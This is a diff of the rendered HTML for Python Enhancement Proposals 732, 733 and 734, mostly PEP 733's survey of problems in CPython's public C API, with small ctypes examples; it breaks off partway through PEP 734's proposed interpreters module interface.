This PEP serves as a charter for the Docs Editorial Board. Changes +to its operation can be made either through a new PEP or through +a change to this PEP. In either case, the change would be decided +upon by the Steering Council after discussion in the community.

+
+
+

PEP Acceptance

+

PEP 732 was accepted by the Python Steering Council on December 11, 2023.

+

The Steering Council commented that, while they don’t disagree with the +scoping set out in the PEP, it would probably make +sense for the Editorial Board to consider expanding the scope to include +docstrings in the standard library, once the Board is sufficiently established +and the higher priorities have been taken care of.

+
+
+

Contact

+

To ask the Editorial Board for a decision, +community members may open an issue in the +python/editorial-board +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0732.rst

+

Last modified: 2024-02-28 06:14:55 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0733/index.html b/pep-0733/index.html new file mode 100644 index 00000000000..cb8a3c3f6ba --- /dev/null +++ b/pep-0733/index.html @@ -0,0 +1,781 @@ + PEP 733 – An Evaluation of Python’s Public C API | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 733 – An Evaluation of Python’s Public C API

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, +Domenico Andreoli <domenico.andreoli at linux.com>, +Stefan Behnel <stefan_ml at behnel.de>, +Carl Friedrich Bolz-Tereick <cfbolz at gmx.de>, +Simon Cross <hodgestar at gmail.com>, +Steve Dower <steve.dower at python.org>, +Tim Felgentreff <tim.felgentreff at oracle.com>, +David Hewitt <1939362+davidhewitt at users.noreply.github.com>, +Shantanu Jain <hauntsaninja at gmail.com>, +Wenzel Jakob <wenzel.jakob at epfl.ch>, +Irit Katriel <irit at python.org>, +Marc-Andre Lemburg <mal at lemburg.com>, +Donghee Na <donghee.na at python.org>, +Karl Nelson <nelson85 at llnl.gov>, +Ronald Oussoren <ronaldoussoren at mac.com>, +Antoine Pitrou <solipsis at pitrou.net>, +Neil Schemenauer <nas at arctrix.com>, +Mark Shannon <mark at hotpy.org>, +Stepan Sindelar <stepan.sindelar at oracle.com>, +Gregory P. Smith <greg at krypto.org>, +Eric Snow <ericsnowcurrently at gmail.com>, +Victor Stinner <vstinner at python.org>, +Guido van Rossum <guido at python.org>, +Petr Viktorin <encukou at gmail.com>, +Carol Willing <willingc at gmail.com>, +William Woodruff <william at yossarian.net>, +David Woods <dw-git at d-woods.co.uk>, +Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
16-Oct-2023
+
Post-History:
+
01-Nov-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This informational PEP describes our shared view of the public C API. The +document defines:

+
    +
  • purposes of the C API
  • +
  • stakeholders and their particular use cases and requirements
  • +
  • strengths of the C API
  • +
  • problems of the C API categorized into nine areas of weakness
  • +
+

This document does not propose solutions to any of the identified problems. By +creating a shared list of C API issues, this document will help to guide +continuing discussion about change proposals and to identify evaluation +criteria.

+
+
+

Introduction

+

Python’s C API was not designed for the different purposes it currently fulfills. It evolved from what was initially the internal API between the C code of the interpreter and the Python language and libraries. In its first incarnation, it was exposed to make it possible to embed Python into C/C++ applications and to write extension modules in C/C++. These capabilities were instrumental to the growth of Python’s ecosystem. Over the decades, the C API grew to provide different tiers of stability, conventions changed, and new usage patterns have emerged, such as bindings to languages other than C/C++. In the next few years, new developments are expected to further test the C API, such as the removal of the GIL and the development of a JIT compiler. However, this growth was not supported by clearly documented guidelines, resulting in inconsistent approaches to API design in different subsystems of CPython. In addition, CPython is no longer the only implementation of Python, and some of the design decisions made when it was the only implementation are difficult for alternative implementations to work with [Issue 64]. In the meantime, lessons were learned and mistakes in both the design and the implementation of the C API were identified.

+

Evolving the C API is hard due to the combination of backwards +compatibility constraints and its inherent complexity, both +technical and social. Different types of users bring different, +sometimes conflicting, requirements. The tradeoff between stability +and progress is an ongoing, highly contentious topic of discussion +when suggestions are made for incremental improvements. +Several proposals have been put forward for improvement, redesign +or replacement of the C API, each representing a deep analysis of +the problems. At the 2023 Language Summit, three back-to-back +sessions were devoted to different aspects of the C API. There is +general agreement that a new design can remedy the problems that +the C API has accumulated over the last 30 years, while at the +same time updating it for use cases that it was not originally +designed for.

+

However, there was also a sense at the Language Summit that we are +trying to discuss solutions without a clear common understanding +of the problems that we are trying to solve. We decided that +we need to agree on the current problems with the C API, before +we are able to evaluate any of the proposed solutions. We +therefore created the +capi-workgroup +repository on GitHub in order to collect everyone’s ideas on that +question.

+

Over 60 different issues were created on that repository, each +describing a problem with the C API. We categorized them and +identified a number of recurring themes. The sections below +mostly correspond to these themes, and each contains a combined +description of the issues raised in that category, along with +links to the individual issues. In addition, we included a section +that aims to identify the different stakeholders of the C API, +and the particular requirements that each of them has.

+
+
+

C API Stakeholders

+

As mentioned in the introduction, the C API was originally +created as the internal interface between CPython’s +interpreter and the Python layer. It was later exposed as +a way for third-party developers to extend and embed Python +programs. Over the years, new types of stakeholders emerged, +with different requirements and areas of focus. This section +describes this complex state of affairs in terms of the +actions that different stakeholders need to perform through +the C API.

+
+

Common Actions for All Stakeholders

+

There are actions which are generic, and required by +all types of API users:

+
    +
  • Define functions and call them
  • +
  • Define new types
  • +
  • Create instances of builtin and user-defined types
  • +
  • Perform operations on object instances
  • +
  • Introspect objects, including types, instances, and functions
  • +
  • Raise and handle exceptions
  • +
  • Import modules
  • +
  • Access Python’s OS interface
  • +
+

The following sections look at the unique requirements of various stakeholders.

+
+
+

Extension Writers

+

Extension writers are the traditional users of the C API. Their requirements +are the common actions listed above. They also commonly need to:

+
    +
  • Create new modules
  • +
  • Efficiently interface between modules at the C level
  • +
+
+
+

Authors of Embedded Python Applications

+

This category covers applications with an embedded Python interpreter, such as Blender and OBS.

+

They need to be able to:

+
    +
  • Configure the interpreter (import paths, inittab, sys.argv, memory +allocator, etc.).
  • +
  • Interact with the execution model and program lifetime, including +clean interpreter shutdown and restart.
  • +
  • Represent complex data models in a way Python can use without +having to create deep copies.
  • +
  • Provide and import frozen modules.
  • +
  • Run and manage multiple independent interpreters (in particular, when +embedded in a library that wants to avoid global effects).
  • +
+
+
+

Python Implementations

+

Python implementations such as CPython, PyPy, GraalPy, IronPython, RustPython, MicroPython, and Jython may take very different approaches to the implementation of different subsystems. They need:

+
    +
  • The API to be abstract and hide implementation details.
  • +
  • A specification of the API, ideally with a test suite +that ensures compatibility.
  • +
  • It would be nice to have an ABI that can be shared +across Python implementations.
  • +
+
+
+

Alternative APIs and Binding Generators

+

There are several projects that implement alternatives to the C API, which offer extension users advantages over programming directly with the C API. These APIs are implemented with the C API, and in some cases by using CPython internals.

+

There are also libraries that create bindings between Python and +other object models, paradigms or languages.

+

There is overlap between these categories: binding generators +usually provide alternative APIs, and vice versa.

+

Examples are +Cython, +cffi, +pybind11 and +nanobind for C++, +PyO3 for Rust, +Shiboken used by +PySide for Qt, +PyGObject for GTK, +Pygolo for Go, +JPype for Java, +PyJNIus for Android, +PyObjC for Objective-C, +SWIG for C/C++, +Python.NET for .NET (C#), +HPy, +Mypyc, +Pythran and +pythoncapi-compat. +CPython’s DSL for parsing function arguments, the +Argument Clinic, +can also be seen as belonging to this category of stakeholders.

+

Alternative APIs need minimal building blocks for accessing CPython +efficiently. They don’t necessarily need an ergonomic API, because +they typically generate code that is not intended to be read +by humans. But they do need it to be comprehensive enough so that +they can avoid accessing internals, without sacrificing performance.

+

Binding generators often need to:

+
    +
  • Create custom objects (e.g. function/module objects +and traceback entries) that match the behavior of equivalent +Python code as closely as possible.
  • +
  • Dynamically create objects which are static in traditional +C extensions (e.g. classes/modules), and need CPython to manage +their state and lifetime.
  • +
  • Dynamically adapt foreign objects (strings, GC’d containers), with +low overhead.
  • +
  • Adapt external mechanisms, execution models and guarantees to the +Python way (stackful coroutines, continuations, +one-writer-or-multiple-readers semantics, virtual multiple inheritance, +1-based indexing, super-long inheritance chains, goroutines, channels, +etc.).
  • +
+

These tools might also benefit from a choice between a more stable +and a faster (possibly lower-level) API. Their users could +then decide whether they can afford to regenerate the code often or +trade some performance for more stability and less maintenance work.

+
+
+
+

Strengths of the C API

+

While the bulk of this document is devoted to problems with the +C API that we would like to see fixed in any new design, it is +also important to point out the strengths of the C API, and to +make sure that they are preserved.

+

As mentioned in the introduction, the C API enabled the +development and growth of the Python ecosystem over the last +three decades, while evolving to support use cases that it was +not originally designed for. This track record in itself is +indication of how effective and valuable it has been.

+

A number of specific strengths were mentioned in the +capi-workgroup discussions. Heap types were identified +as much safer and easier to use than static types +[Issue 4].

+

API functions that take a C string literal for lookups based +on a Python string are very convenient +[Issue 30].

+

The limited API demonstrates that an API which hides implementation +details makes it easier to evolve Python +[Issue 30].

+
+
+

C API problems

+

The remainder of this document summarizes and categorizes the problems that were reported on +the capi-workgroup repository. +The issues are grouped into several categories.

+
+

API Evolution and Maintenance

+

The difficulty of making changes in the C API is central to this report. It is +implicit in many of the issues we discuss here, particularly when we need to +decide whether an incremental bugfix can resolve the issue, or whether it can +only be addressed as part of an API redesign +[Issue 44]. The +benefit of each incremental change is often viewed as too small to justify the +disruption. Over time, this implies that every mistake we make in an API’s +design or implementation remains with us indefinitely.

+

We can take two views on this issue. One is that this is a problem and the +solution needs to be baked into any new C API we design, in the form of a +process for incremental API evolution, which includes deprecation and +removal of API elements. The other possible approach is that this is not +a problem to be solved, but rather a feature of any API. In this +view, API evolution should not be incremental, but rather through large +redesigns, each of which learns from the mistakes of the past and is not +shackled by backwards compatibility requirements (in the meantime, new +API elements may be added, but nothing can ever be removed). A compromise +approach is somewhere between these two extremes, fixing issues which are +easy or important enough to tackle incrementally, and leaving others alone.

+

The problem we have in CPython is that we don’t have an agreed, official +approach to API evolution. Different members of the core team are pulling in +different directions and this is an ongoing source of disagreements. +Any new C API needs to come with a clear decision about the model +that its maintenance will follow, as well as the technical and +organizational processes by which this will work.

+

If the model does include provisions for incremental evolution of the API, +it will include processes for managing the impact of the change on users +[Issue 60], +perhaps through introducing an external backwards compatibility module +[Issue 62], +or a new API tier of “blessed” functions +[Issue 55].

+
+
+

API Specification and Abstraction

+

The C API does not have a formal specification; it is currently defined as whatever the reference implementation (CPython) contains in a particular version. The documentation acts as an incomplete description, which is not sufficient for verifying the correctness of either the full API, the limited API, or the stable ABI. As a result, the C API may change significantly between releases without needing a more visible specification update, and this leads to a number of problems.

+

Bindings for languages other than C/C++ must parse C code +[Issue 7]. +Some C language features are hard to handle in this way, because +they produce compiler-dependent output (such as enums) or require +a C preprocessor/compiler rather than just a parser (such as macros) +[Issue 35].

+

Furthermore, C header files tend to expose more than what is intended +to be part of the public API +[Issue 34]. +In particular, implementation details such as the precise memory +layouts of internal data structures can be exposed +[Issue 22 +and PEP 620]. +This can make API evolution very difficult, in particular when it +occurs in the stable ABI as in the case of ob_refcnt and ob_type, +which are accessed via the reference counting macros +[Issue 45].

+

We identified a deeper issue in relation to the way that reference +counting is exposed. The way that C extensions are required to +manage references with calls to Py_INCREF and Py_DECREF is +specific to CPython’s memory model, and is hard for alternative +Python implementations to emulate. +[Issue 12].

+

Another set of problems arises from the fact that a PyObject* is +exposed in the C API as an actual pointer rather than a handle. The +address of an object serves as its ID and is used for comparison, +and this complicates matters for alternative Python implementations +that move objects during GC +[Issue 37].

+

A separate issue is that object references are opaque to the runtime, +discoverable only through calls to tp_traverse/tp_clear, +which have their own purposes. If there was a way for the runtime to +know the structure of the object graph, and keep up with changes in it, +this would make it possible for alternative implementations to implement +different memory management schemes +[Issue 33].

+
+
+

Object Reference Management

+

There is no consistent naming convention that makes the reference semantics of a function obvious, and this leads to error-prone C API functions that do not follow the typical behaviour. When a C API function returns a PyObject*, the caller typically gains ownership of a reference to the object. However, there are exceptions where a function returns a “borrowed” reference, which the caller can access but does not own a reference to. Similarly, functions typically do not change the ownership of references to their arguments, but there are exceptions where a function “steals” a reference, i.e., the ownership of the reference is permanently transferred from the caller to the callee by the call [Issue 8 and Issue 52]. The terminology used to describe these situations in the documentation can also be improved [Issue 11].

+

A more radical change is necessary in the case of functions that +return “borrowed” references (such as PyList_GetItem) +[Issue 5 and +Issue 21] +or pointers to parts of the internal structure of an object +(such as PyBytes_AsString) +[Issue 57]. +In both cases, the reference/pointer is valid for as long as the +owning object holds the reference, but this time is hard to reason about. +Such functions should not exist in the API without a mechanism that can +make them safe.

+

For containers, the API is currently missing bulk operations on the +references of contained objects. This is particularly important for +a stable ABI where INCREF and DECREF cannot be macros, making +bulk operations expensive when implemented as a sequence of function +calls +[Issue 15].

+
+
+

Type Definition and Object Creation

+

The C API has functions that make it possible to create incomplete +or inconsistent Python objects, such as PyTuple_New and +PyUnicode_New. This causes problems when the object is tracked +by GC or its tp_traverse/tp_clear functions are called. +A related issue is with functions such as PyTuple_SetItem +which is used to modify a partially initialized tuple (tuples +are immutable once fully initialized) +[Issue 56].

+

We identified a few issues with type definition APIs. For legacy reasons, there is often a significant amount of code duplication between tp_new and tp_vectorcall [Issue 24]. Type slot functions should be called indirectly, so that their signatures can change to include context information [Issue 13]. Several aspects of the type definition and creation process are not well defined, such as which stage of the process is responsible for initializing and clearing different fields of the type object [Issue 49].

+
+
+

Error Handling

+

Error handling in the C API is based on the error indicator which is stored +on the thread state (in global scope). The design intention was that each +API function returns a value indicating whether an error has occurred (by +convention, -1 or NULL). When the program knows that an error +occurred, it can fetch the exception object which is stored in the +error indicator. We identified a number of problems which are related +to error handling, pointing at APIs which are too easy to use incorrectly.

+

There are functions that do not report all errors that occur while they +execute. For example, PyDict_GetItem clears any errors that occur +when it calls the key’s hash function, or while performing a lookup +in the dictionary +[Issue 51].

+

Python code never executes with an in-flight exception (by definition), +and typically code using native functions should also be interrupted by +an error being raised. This is not checked in most C API functions, and +there are places in the interpreter where error handling code calls a C API +function while an exception is set. For example, see the call to +PyUnicode_FromString in the error handler of _PyErr_WriteUnraisableMsg +[Issue 2].

+

There are functions that do not return a value, so a caller is forced to +query the error indicator in order to identify whether an error has occurred. +An example is PyBuffer_Release +[Issue 20]. +There are other functions which do have a return value, but this return value +does not unambiguously indicate whether an error has occurred. For example, +PyLong_AsLong returns -1 in case of error, or when the value of the +argument is indeed -1 +[Issue 1]. +In both cases, the API is error prone because it is possible that the +error indicator was already set before the function was called, and the +error is incorrectly attributed. The fact that the error was not detected +before the call is a bug in the calling code, but the behaviour of the +program in this case doesn’t make it easy to identify and debug the +problem.
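The ambiguity can even be observed from Python, by calling the C API through ctypes (a minimal sketch; ctypes.pythonapi raises the pending Python exception after a call into the C API, which stands in for the explicit PyErr_Occurred() check a C caller must make):

import ctypes

api = ctypes.pythonapi
api.PyLong_AsLong.argtypes = [ctypes.py_object]
api.PyLong_AsLong.restype = ctypes.c_long

# A legitimate value of -1 returns -1 with no error set...
print(api.PyLong_AsLong(-1))          # -1
# ...and a failing call also returns -1, distinguishable only
# via the error indicator (surfaced here as a raised TypeError).
try:
    api.PyLong_AsLong("not an int")
except TypeError as exc:
    print(exc)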

+

There are functions that take a PyObject* argument, with special meaning +when it is NULL. For example, if PyObject_SetAttr receives NULL as +the value to set, this means that the attribute should be cleared. This is error +prone because it could be that NULL indicates an error in the construction +of the value, and the program failed to check for this error. The program will +misinterpret the NULL to mean something different than error +[Issue 47].

+
+
+

API Tiers and Stability Guarantees

+

The different API tiers provide different tradeoffs of stability vs +API evolution, and sometimes performance.

+

The stable ABI was identified as an area that needs to be looked into. At +the moment it is incomplete and not widely adopted. At the same time, its +existence is making it hard to make changes to some implementation +details, because it exposes struct fields such as ob_refcnt, +ob_type and ob_size. There was some discussion about whether +the stable ABI is worth keeping. Arguments on both sides can be +found in [Issue 4] +and [Issue 9].

+

Alternatively, it was suggested that in order to be able to evolve +the stable ABI, we need a mechanism to support multiple versions of +it in the same Python binary. It was pointed out that versioning +individual functions within a single ABI version is not enough +because it may be necessary to evolve, together, a group of functions +that interoperate with each other +[Issue 39].

+

The limited API was introduced in 3.2 as a blessed subset of the C API +which is recommended for users who would like to restrict themselves +to high quality APIs which are not likely to change often. The +Py_LIMITED_API flag allows users to restrict their program to older +versions of the limited API, but we now need the opposite option, to +exclude older versions. This would make it possible to evolve the +limited API by replacing flawed elements in it +[Issue 54]. +More generally, in a redesign we should revisit the way that API +tiers are specified and consider designing a method that will unify the +way we currently select between the different tiers +[Issue 59].

+

API elements whose names begin with an underscore are considered +private, essentially an API tier with no stability guarantees. +However, this was only clarified recently, in PEP 689. It is +not clear what the change policy should be with respect to such +API elements that predate PEP 689 +[Issue 58].

+

There are API functions which have an unsafe (but fast) version as well as +a safe version which performs error checking (for example, +PyTuple_GET_ITEM vs PyTuple_GetItem). It may help to +be able to group them into their own tiers - the “unsafe API” tier and +the “safe API” tier +[Issue 61].

+
+
+

Use of the C Language

+

A number of issues were raised with respect to the way that CPython +uses the C language. First there is the issue of which C dialect +we use, and how we test our compatibility with it, as well as API +header compatibility with C++ dialects +[Issue 42].

+

Usage of const in the API is currently sparse, but it is not +clear whether this is something that we should consider changing +[Issue 38].

+

We currently use the C types long and int, where fixed-width integers +such as int32_t and int64_t may now be better choices +[Issue 27].

+

We are using C language features which are hard for other languages +to interact with, such as macros, variadic arguments, enums, bitfields, +and non-function symbols +[Issue 35].

+

There are API functions that take a PyObject* arg which must be +of a more specific type (such as PyTuple_Size, which fails if +its arg is not a PyTupleObject*). It is an open question whether this +is a good pattern to have, or whether the API should expect the +more specific type +[Issue 31].
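As a sketch of the current pattern (again via ctypes, which surfaces the error indicator as a raised exception), PyTuple_Size accepts any PyObject* and only fails at runtime on a non-tuple:

import ctypes

api = ctypes.pythonapi
api.PyTuple_Size.argtypes = [ctypes.py_object]
api.PyTuple_Size.restype = ctypes.c_ssize_t

print(api.PyTuple_Size((1, 2, 3)))    # 3
try:
    api.PyTuple_Size([1, 2, 3])       # a list fails the internal tuple check
except SystemError as exc:
    print(exc)                        # "bad argument to internal function"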

+

There are functions in the API that take concrete types, such as +PyDict_GetItemString which performs a dictionary lookup for a key +specified as a C string rather than PyObject*. At the same time, +for PyDict_ContainsString it is not considered appropriate to +add a concrete type alternative. The principle around this should +be documented in the guidelines +[Issue 23].

+
+
+

Implementation Flaws

+

Below is a list of localized implementation flaws. Most of these can +probably be fixed incrementally, if we choose to do so. They should, +in any case, be avoided in any new API design.

+

There are functions that don’t follow the convention of returning 0 for success and -1 for failure. For example, PyArg_ParseTuple returns 0 for failure and non-zero for success [Issue 25].

+

The macros Py_CLEAR and Py_SETREF access their arg more than +once, so if the arg is an expression with side effects, they are +duplicated +[Issue 3].

+

The meaning of Py_SIZE depends on the type and is not always +reliable +[Issue 10].

+

Some API functions do not have the same behaviour as their Python equivalents. The behaviour of PyIter_Next is different from tp_iternext [Issue 29]. The behaviour of PySet_Contains is different from set.__contains__ [Issue 6].
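For example, set.__contains__ coerces an unhashable set key to a frozenset before the lookup, while PySet_Contains does not (a sketch via ctypes; the raised TypeError reflects the error indicator set by the C function):

import ctypes

api = ctypes.pythonapi
api.PySet_Contains.argtypes = [ctypes.py_object, ctypes.py_object]
api.PySet_Contains.restype = ctypes.c_int

s = {frozenset({1, 2})}
print({1, 2} in s)                    # True: the key is coerced to frozenset
try:
    api.PySet_Contains(s, {1, 2})     # no coercion at the C level
except TypeError as exc:
    print(exc)                        # unhashable type: 'set'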

+

The fact that PyArg_ParseTupleAndKeywords takes a non-const +char* array as argument makes it more difficult to use +[Issue 28].

+

Python.h does not expose the whole API. Some headers (like marshal.h) +are not included from Python.h. +[Issue 43].

+

Naming

+

PyLong and PyUnicode use names which no longer match the Python +types they represent (int/str). This could be fixed in a new API +[Issue 14].

+

There are identifiers in the API which are lacking a Py/_Py +prefix +[Issue 46].

+
+
+

Missing Functionality

+

This section consists of a list of feature requests, i.e., functionality +that was identified as missing in the current C API.

+
+

Debug Mode

+

A debug mode that can be activated without recompilation, and which enables various checks to help detect different types of errors [Issue 36].

+
+
+

Introspection

+

There aren’t currently reliable introspection capabilities for objects +defined in C in the same way as there are for Python objects +[Issue 32].

+

Efficient type checking for heap types +[Issue 17].

+
+
+

Improved Interaction with Other Languages

+

Interfacing with other GC-based languages, and integrating their GC with Python’s GC [Issue 19].

+

Inject foreign stack frames into the traceback [Issue 18].

+

Concrete strings that can be used in other languages +[Issue 16].

+
+
+
+
+

References

+
    +
  1. Python/C API Reference Manual
  2. 2023 Language Summit Blog Post: Three Talks on the C API
  3. capi-workgroup on GitHub
  4. Irit’s Core Sprint 2023 slides about C API workgroup
  5. Petr’s Core Sprint 2023 slides
  6. HPy team’s Core Sprint 2023 slides for Things to Learn from HPy
  7. Victor’s slides of Core Sprint 2023 Python C API talk
  8. The Python’s stability promise — Cristián Maureira-Fredes, PySide maintainer
  9. Report on the issues PySide had 5 years ago when switching to the stable ABI
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0733.rst

+

Last modified: 2024-10-28 18:52:58 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0734/index.html b/pep-0734/index.html new file mode 100644 index 00000000000..1a5ca19e5ce --- /dev/null +++ b/pep-0734/index.html @@ -0,0 +1,1168 @@ + PEP 734 – Multiple Interpreters in the Stdlib | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 734 – Multiple Interpreters in the Stdlib

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
06-Nov-2023
+
Python-Version:
+
3.13
+
Post-History:
+
14-Dec-2023
+
Replaces:
+
554
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP is essentially a continuation of PEP 554. That document +had grown a lot of ancillary information across 7 years of discussion. +This PEP is a reduction back to the essential information. Much of +that extra information is still valid and useful, just not in the +immediate context of the specific proposal here.

+
+
+

Abstract

+

This PEP proposes to add a new module, interpreters, to support +inspecting, creating, and running code in multiple interpreters in the +current process. This includes Interpreter objects that represent +the underlying interpreters. The module will also provide a basic +Queue class for communication between interpreters. +Finally, we will add a new concurrent.futures.InterpreterPoolExecutor +based on the interpreters module.

+
+
+

Introduction

+

Fundamentally, an “interpreter” is the collection of (essentially) +all runtime state which Python threads must share. So, let’s first +look at threads. Then we’ll circle back to interpreters.

+
+

Threads and Thread States

+

A Python process will have one or more OS threads running Python code +(or otherwise interacting with the C API). Each of these threads +interacts with the CPython runtime using its own thread state +(PyThreadState), which holds all the runtime state unique to that +thread. There is also some runtime state that is shared between +multiple OS threads.

+

Any OS thread may switch which thread state it is currently using, as +long as it isn’t one that another OS thread is already using (or has +been using). This “current” thread state is stored by the runtime +in a thread-local variable, and may be looked up explicitly with +PyThreadState_Get(). It gets set automatically for the initial +(“main”) OS thread and for threading.Thread objects. From the +C API it is set (and cleared) by PyThreadState_Swap() and may +be set by PyGILState_Ensure(). Most of the C API requires that +there be a current thread state, either looked up implicitly +or passed in as an argument.

+

The relationship between OS threads and thread states is one-to-many. +Each thread state is associated with at most a single OS thread and +records its thread ID. A thread state is never used for more than one +OS thread. In the other direction, however, an OS thread may have more +than one thread state associated with it, though, again, only one +may be current.

+

When there’s more than one thread state for an OS thread, +PyThreadState_Swap() is used in that OS thread to switch +between them, with the requested thread state becoming the current one. +Whatever was running in the thread using the old thread state is +effectively paused until that thread state is swapped back in.

+
+
+

Interpreter States

+

As noted earlier, there is some runtime state that multiple OS threads +share. Some of it is exposed by the sys module, though much is +used internally and not exposed explicitly or only through the C API.

+

This shared state is called the interpreter state +(PyInterpreterState). We’ll sometimes refer to it here as just +“interpreter”, though that is also sometimes used to refer to the +python executable, to the Python implementation, and to the +bytecode interpreter (i.e. exec()/eval()).

+

CPython has supported multiple interpreters in the same process (AKA +“subinterpreters”) since version 1.5 (1997). The feature has been +available via the C API.

+
+
+

Interpreters and Threads

+

Thread states are related to interpreter states in much the same way +that OS threads and processes are related (at a high level). To +begin with, the relationship is one-to-many. +A thread state belongs to a single interpreter (and stores +a pointer to it). That thread state is never used for a different +interpreter. In the other direction, however, an interpreter may have +zero or more thread states associated with it. The interpreter is only +considered active in OS threads where one of its thread states +is current.

+

Interpreters are created via the C API using +Py_NewInterpreterFromConfig() (or Py_NewInterpreter(), which +is a light wrapper around Py_NewInterpreterFromConfig()). +That function does the following:

+
    +
  1. create a new interpreter state
  2. create a new thread state
  3. set the thread state as current (a current tstate is needed for interpreter init)
  4. initialize the interpreter state using that thread state
  5. return the thread state (still current)
+

Note that the returned thread state may be immediately discarded. +There is no requirement that an interpreter have any thread states, +except as soon as the interpreter is meant to actually be used. +At that point it must be made active in the current OS thread.

+

To make an existing interpreter active in the current OS thread, +the C API user first makes sure that interpreter has a corresponding +thread state. Then PyThreadState_Swap() is called like normal +using that thread state. If the thread state for another interpreter +was already current then it gets swapped out like normal and execution +of that interpreter in the OS thread is thus effectively paused until +it is swapped back in.

+

Once an interpreter is active in the current OS thread like that, the +thread can call any of the C API, such as PyEval_EvalCode() +(i.e. exec()). This works by using the current thread state as +the runtime context.

+
+
+

The “Main” Interpreter

+

When a Python process starts, it creates a single interpreter state +(the “main” interpreter) with a single thread state for the current +OS thread. The Python runtime is then initialized using them.

+

After initialization, the script or module or REPL is executed using +them. That execution happens in the interpreter’s __main__ module.

+

When the process finishes running the requested Python code or REPL, +in the main OS thread, the Python runtime is finalized in that thread +using the main interpreter.

+

Runtime finalization has only a slight, indirect effect on still-running Python threads, whether in the main interpreter or in subinterpreters. That’s because it begins by waiting indefinitely for all non-daemon Python threads to finish.

+

While the C API may be queried, there is no mechanism by which any Python thread is directly alerted that finalization has begun, other than perhaps with “atexit” functions that may have been registered using threading._register_atexit().

+

Any remaining subinterpreters are themselves finalized later, +but at that point they aren’t current in any OS threads.

+
+
+

Interpreter Isolation

+

CPython’s interpreters are intended to be strictly isolated from each +other. That means interpreters never share objects (except in very +specific cases with immortal, immutable builtin objects). Each +interpreter has its own modules (sys.modules), classes, functions, +and variables. Even where two interpreters define the same class, +each will have its own copy. The same applies to state in C, including +in extension modules. The CPython C API docs explain more.

+

Notably, there is some process-global state that interpreters will +always share, some mutable and some immutable. Sharing immutable +state presents few problems, while providing some benefits (mainly +performance). However, all shared mutable state requires special +management, particularly for thread-safety, some of which the OS +takes care of for us.

+

Mutable:

+
    +
  • file descriptors
  • +
  • low-level env vars
  • +
  • process memory (though allocators are isolated)
  • +
  • the list of interpreters
  • +
+

Immutable:

+
    +
  • builtin types (e.g. dict, bytes)
  • +
  • singletons (e.g. None)
  • +
  • underlying static module data (e.g. functions) for +builtin/extension/frozen modules
  • +
+
+
+

Existing Execution Components

+

There are a number of existing parts of Python that may help +with understanding how code may be run in a subinterpreter.

+

In CPython, each component is built around one of the following +C API functions (or variants):

+
    +
  • PyEval_EvalCode(): run the bytecode interpreter with the given +code object
  • +
  • PyRun_String(): compile + PyEval_EvalCode()
  • +
  • PyRun_File(): read + compile + PyEval_EvalCode()
  • +
  • PyRun_InteractiveOneObject(): compile + PyEval_EvalCode()
  • +
  • PyObject_Call(): calls PyEval_EvalCode()
  • +
+
+

builtins.exec()

+

The builtin exec() may be used to execute Python code. It is +essentially a wrapper around the C API functions PyRun_String() +and PyEval_EvalCode().

+

Here are some relevant characteristics of the builtin exec():

+
    +
  • It runs in the current OS thread and pauses whatever +was running there, which resumes when exec() finishes. +No other OS threads are affected. +(To avoid pausing the current Python thread, run exec() +in a threading.Thread.)
  • +
  • It may start additional threads, which don’t interrupt it.
  • +
  • It executes against a “globals” namespace (and a “locals” +namespace). At module-level, exec() defaults to using +__dict__ of the current module (i.e. globals()). +exec() uses that namespace as-is and does not clear it before or after.
  • +
  • It propagates any uncaught exception from the code it ran. +The exception is raised from the exec() call in the Python +thread that originally called exec().
  • +
+
+
+
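A small illustration of the namespace and exception behaviour described above (plain exec() semantics, independent of this proposal):

ns = {}
exec("x = 1 + 1", ns)        # runs against the explicit globals namespace
print(ns["x"])               # 2; exec() used ns as-is and did not clear it

try:
    exec("raise ValueError('oops')", ns)
except ValueError as exc:    # uncaught exceptions propagate from the exec() call
    print(exc)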

Command-line

+

The python CLI provides several ways to run Python code. In each +case it maps to a corresponding C API call:

+
    +
  • <no args>, -i - run the REPL +(PyRun_InteractiveOneObject())
  • +
  • <filename> - run a script (PyRun_File())
  • +
  • -c <code> - run the given Python code (PyRun_String())
  • +
  • -m module - run the module as a script +(PyEval_EvalCode() via runpy._run_module_as_main())
  • +
+

In each case it is essentially a variant of running exec() +at the top-level of the __main__ module of the main interpreter.

+
+
+

threading.Thread

+

When a Python thread is started, it runs the “target” function with PyObject_Call() using a new thread state. The globals namespace comes from func.__globals__ and any uncaught exception is discarded.

+
+
+
+
+

Motivation

+

The interpreters module will provide a high-level interface to the +multiple interpreter functionality. The goal is to make the existing +multiple-interpreters feature of CPython more easily accessible to +Python code. This is particularly relevant now that CPython has a +per-interpreter GIL (PEP 684) and people are more interested +in using multiple interpreters.

+

Without a stdlib module, users are limited to the +C API, which restricts how much +they can try out and take advantage of multiple interpreters.

+

The module will include a basic mechanism for communicating between +interpreters. Without one, multiple interpreters are a much less +useful feature.

+
+
+

Specification

+

The module will:

+
    +
  • expose the existing multiple interpreter support
  • +
  • introduce a basic mechanism for communicating between interpreters
  • +
+

The module will wrap a new low-level _interpreters module +(in the same way as the threading module). +However, that low-level API is not intended for public use +and thus not part of this proposal.

+
+

Using Interpreters

+

The module defines the following functions:

+
    +
  • +
    get_current() -> Interpreter
    Returns the Interpreter object for the currently executing +interpreter.
    +
    +
  • +
  • +
    list_all() -> list[Interpreter]
    Returns the Interpreter object for each existing interpreter, +whether it is currently running in any OS threads or not.
    +
    +
  • +
  • +
    create() -> Interpreter
